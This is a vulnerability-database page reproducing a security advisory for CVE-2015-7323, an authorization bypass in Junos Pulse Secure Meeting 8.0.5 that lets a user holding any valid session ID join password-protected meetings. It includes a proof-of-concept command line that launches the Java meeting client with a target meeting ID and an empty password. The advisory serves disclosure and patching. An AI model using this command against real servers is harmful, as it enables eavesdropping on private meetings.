Junos Pulse Secure Meeting 8.0.5 Access Bypass

🗓️ 25 Sep 2015 00:00:00Reported by Profundis LabsType

packetstorm🔗 packetstormsecurity.com👁 67 Views

Junos Pulse Secure Meeting 8.0.5 Access Bypass - Insufficient authorization checks allowing unauthorized access to secure meetings

Reporter	Title	Published	Views	Family All 15
0day.today	Junos Pulse Secure Meeting 8.0.5 Access Bypass Vulnerability	26 Sep 201500:00	–	zdt
CNVD	Pulse Connect Secure Secure Meeting Component Access Control Vulnerability	3 Oct 201500:00	–	cnvd
CNVD	Pulse Connect Secure Legitimate Conference ID Number Disclosure Vulnerability	3 Oct 201500:00	–	cnvd
CVE	CVE-2015-7322	5 Oct 201515:00	–	cve
CVE	CVE-2015-7323	5 Oct 201515:00	–	cve
Cvelist	CVE-2015-7322	5 Oct 201515:00	–	cvelist
Cvelist	CVE-2015-7323	5 Oct 201515:00	–	cvelist
EUVD	EUVD-2015-7247	7 Oct 202500:30	–	euvd
EUVD	EUVD-2015-7248	7 Oct 202500:30	–	euvd
Ivanti	SA40054 - 2015-09: Security Advisory: Secure Meeting (Pulse Collaboration) issue may allow authenticated users to bypass meeting authorization (CVE-2015-7323)	14 Feb 202307:22	–	ivanti

`Profundis Labs Security Advisory  
https://profundis-labs.com/advisories/CVE-2015-7323.txt  
  
Product:  
================================  
Junos Pulse Secure Meeting  
  
Secure Meeting is a part of the Junos Puls Collaboration software, which  
allows you to organize and holding virtual meetings with internal and  
external users via the Juniper Access Gateway.  
  
Vulnerability Type:  
===================  
Insufficient Authorization Checks  
  
CVE Reference:  
==============  
CVE-2015-7323  
  
VENDOR Reference:  
=================  
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054  
  
Vulnerability Details:  
=====================  
  
It is possible to enter "secure" meetings without knowledge of the password  
and the invitation link using the java fat client (meetingAppSun.jar).  
  
To access such meetings the following information is required: - A valid  
sessionID (DSID). This sessionID can be obtained by either having an  
invitation link to any other meeting or the user has a valid account to log  
into junos pulse using the http login form. - The meeting ID The meeting ID  
is a 7-8 digits number which may be gained using brute force or via  
CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt)  
  
Note: The vulnerability is only related to the java fat client. If a user  
tries to access a secure meeting using the web browser (  
https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0),  
the meeting password (or invitation link) is required.  
  
PoC code(s):  
===============  
Example how to start the java fat client to access a meeting A from the  
command line:  
java -classpath  
/usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar  
SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type  
0 Parameter0  
"meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url="  
uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid  
"DSID=PARAM_C"  
  
PARAM_A = meeting ID of Meeting A  
PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server  
PARAM_C = a valid sessionID  
PARAM_D = the domain/IP of the Junos Pulse server  
  
Disclosure Timeline:  
=========================================================  
  
Vendor Notification: 01/2015  
Vendor Confirmation: 03/2015  
Vendor Patch Release: 06/2015  
Public Disclosure: 09/2015  
  
Affected Version:  
=========================================================  
8.0.5  
  
Exploitation Technique:  
=======================  
Remote  
  
Severity Level:  
=========================================================  
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)  
  
  
`

25 Sep 2015 00:00Current

EPSS0.00369